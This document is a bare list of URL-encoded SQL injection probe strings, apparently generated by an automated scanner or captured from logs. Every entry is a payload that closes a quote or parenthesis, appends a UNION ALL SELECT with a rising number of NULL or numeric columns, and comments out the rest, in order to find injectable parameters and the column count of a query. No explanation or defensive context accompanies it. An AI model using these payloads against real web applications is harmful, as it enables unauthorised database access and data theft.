1234.5%27%20%2B%20%28SELECT%20%27ESsa%27%20FROM%20DUAL%20WHERE%206522%3D6522%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27SMzM%27%20FROM%20DUAL%20WHERE%207226%3D7226%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Xaop%27%20FROM%20DUAL%20WHERE%209940%3D9940%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27reTY%27%20FROM%20DUAL%20WHERE%204748%3D4748%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Vrvq%27%20FROM%20DUAL%20WHERE%203309%3D3309%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jDMU%27%20FROM%20DUAL%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uCly%27%20FROM%20DUAL%20WHERE%201548%3D1548%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27eWwx%27%20FROM%20DUAL%20WHERE%207863%3D7863%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zxIR%27%20FROM%20DUAL%20WHERE%205985%3D5985%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kxgy%27%20FROM%20DUAL%20WHERE%207011%3D7011%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Lgkz%27%20WHERE%203941%3D3941%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CbyU%27%20WHERE%209771%3D9771%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27bahp%27%20WHERE%208913%3D8913%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Dmhr%27%20WHERE%206000%3D6000%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27cVPy%27%20WHERE%204944%3D4944%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zOXr%27%20WHERE%209041%3D9041%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jRvV%27%20WHERE%206946%3D6946%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27BMKO%27%20WHERE%209666%3D9666%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27VsMr%27%20WHERE%209694%3D9694%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27RtDw%27%20WHERE%203943%3D3943%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%23 -5748%29%20UNION%20ALL%20SELECT%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%23 -5386%29%20UNION%20ALL%20SELECT%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%2C%206230%23 -8780%29%20UNION%20ALL%20SELECT%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%2C%205345%23 -5382%29%20UNION%20ALL%20SELECT%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%2C%202146%23 -6345%29%20UNION%20ALL%20SELECT%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%2C%206547%23 -1656%29%20UNION%20ALL%20SELECT%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%2C%204751%23 -3437%29%20UNION%20ALL%20SELECT%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%2C%202840%23 -2634%29%20UNION%20ALL%20SELECT%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%2C%202358%23 -3740%29%20UNION%20ALL%20SELECT%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%2C%206660%23 -9650%29%20UNION%20ALL%20SELECT%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%2C%209783%23 -5830%27%29%20UNION%20ALL%20SELECT%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%23 -4368%27%29%20UNION%20ALL%20SELECT%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%2C%205770%23 -3967%27%29%20UNION%20ALL%20SELECT%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%2C%206761%23 -5520%27%29%20UNION%20ALL%20SELECT%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%2C%205857%23 -9665%27%29%20UNION%20ALL%20SELECT%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%2C%204742%23 -2036%27%29%20UNION%20ALL%20SELECT%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%2C%205317%23 -4142%27%29%20UNION%20ALL%20SELECT%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%2C%209095%23 -2879%27%29%20UNION%20ALL%20SELECT%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%2C%208944%23 -6161%27%29%20UNION%20ALL%20SELECT%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%2C%208398%23 -2591%27%29%20UNION%20ALL%20SELECT%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%2C%209116%23 -4554%27%20UNION%20ALL%20SELECT%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%2C%202624%23 -6871%27%20UNION%20ALL%20SELECT%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%2C%209047%23 -6261%27%20UNION%20ALL%20SELECT%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%2C%208611%23 -9607%27%20UNION%20ALL%20SELECT%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%2C%207576%23 -9590%27%20UNION%20ALL%20SELECT%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%2C%206424%23 -4652%27%20UNION%20ALL%20SELECT%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%2C%205496%23 -4728%27%20UNION%20ALL%20SELECT%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%2C%205217%23 -7556%27%20UNION%20ALL%20SELECT%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%2C%209831%23 -5173%27%20UNION%20ALL%20SELECT%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%23 -6385%27%20UNION%20ALL%20SELECT%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%2C%203167%23 -3118%22%20UNION%20ALL%20SELECT%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%2C%205762%23 -8213%22%20UNION%20ALL%20SELECT%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%2C%202310%23 -4132%22%20UNION%20ALL%20SELECT%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%2C%204538%23 -8429%22%20UNION%20ALL%20SELECT%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%23 -1542%22%20UNION%20ALL%20SELECT%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%2C%208897%23 -4370%22%20UNION%20ALL%20SELECT%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%2C%207850%23 -2194%22%20UNION%20ALL%20SELECT%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%23 -5876%22%20UNION%20ALL%20SELECT%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%23 -8905%22%20UNION%20ALL%20SELECT%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%23 -5036%22%20UNION%20ALL%20SELECT%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%23 -3909%29%20UNION%20ALL%20SELECT%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%23%20AND%20%283875%3D3875 -4775%29%20UNION%20ALL%20SELECT%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%23%20AND%20%281977%3D1977 -6929%29%20UNION%20ALL%20SELECT%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%2C%207864%23%20AND%20%287176%3D7176 -8877%29%20UNION%20ALL%20SELECT%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%2C%208494%23%20AND%20%286750%3D6750 -5001%29%20UNION%20ALL%20SELECT%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%2C%203202%23%20AND%20%282727%3D2727 -7851%29%20UNION%20ALL%20SELECT%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%2C%208484%23%20AND%20%283540%3D3540 -2045%29%20UNION%20ALL%20SELECT%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%2C%202715%23%20AND%20%288572%3D8572 -9229%29%20UNION%20ALL%20SELECT%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%2C%202041%23%20AND%20%289028%3D9028 -9399%29%20UNION%20ALL%20SELECT%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%2C%205506%23%20AND%20%281370%3D1370 -3917%29%20UNION%20ALL%20SELECT%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%2C%201947%23%20AND%20%285619%3D5619 -4717%29%29%20UNION%20ALL%20SELECT%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%2C%203717%23%20AND%20%28%282353%3D2353 -4548%29%29%20UNION%20ALL%20SELECT%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%2C%202001%23%20AND%20%28%285701%3D5701 -3144%29%29%20UNION%20ALL%20SELECT%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%2C%206398%23%20AND%20%28%287513%3D7513 -4781%29%29%20UNION%20ALL%20SELECT%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%2C%203198%23%20AND%20%28%284649%3D4649 -3761%29%29%20UNION%20ALL%20SELECT%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%2C%208275%23%20AND%20%28%287828%3D7828 -2937%29%29%20UNION%20ALL%20SELECT%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%2C%208073%23%20AND%20%28%281791%3D1791 -3909%29%29%20UNION%20ALL%20SELECT%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%2C%205299%23%20AND%20%28%283283%3D3283 -9818%29%29%20UNION%20ALL%20SELECT%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%2C%201028%23%20AND%20%28%289954%3D9954 -9359%29%29%20UNION%20ALL%20SELECT%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%2C%203068%23%20AND%20%28%283665%3D3665 -4324%29%29%20UNION%20ALL%20SELECT%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%2C%208108%23%20AND%20%28%286228%3D6228 -1468%29%29%29%20UNION%20ALL%20SELECT%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%2C%203616%23%20AND%20%28%28%286446%3D6446 -6732%29%29%29%20UNION%20ALL%20SELECT%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%2C%202697%23%20AND%20%28%28%289824%3D9824 -7247%29%29%29%20UNION%20ALL%20SELECT%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%2C%206741%23%20AND%20%28%28%287600%3D7600 -8960%29%29%29%20UNION%20ALL%20SELECT%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%2C%205625%23%20AND%20%28%28%287491%3D7491 -7694%29%29%29%20UNION%20ALL%20SELECT%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%2C%209181%23%20AND%20%28%28%282403%3D2403 -8277%29%29%29%20UNION%20ALL%20SELECT%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%23%20AND%20%28%28%285284%3D5284 -1170%29%29%29%20UNION%20ALL%20SELECT%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%23%20AND%20%28%28%286959%3D6959 -9795%29%29%29%20UNION%20ALL%20SELECT%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%2C%205428%23%20AND%20%28%28%287829%3D7829 -1920%29%29%29%20UNION%20ALL%20SELECT%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%2C%203219%23%20AND%20%28%28%282420%3D2420 -6678%29%29%29%20UNION%20ALL%20SELECT%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%2C%208937%23%20AND%20%28%28%287773%3D7773 -6168%20UNION%20ALL%20SELECT%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%2C%207803%23 -3670%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%23 -6408%20UNION%20ALL%20SELECT%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%2C%206211%23 -3127%20UNION%20ALL%20SELECT%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%23 -7796%20UNION%20ALL%20SELECT%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%2C%207268%23 -6165%20UNION%20ALL%20SELECT%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%23 -1754%20UNION%20ALL%20SELECT%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%2C%203759%23 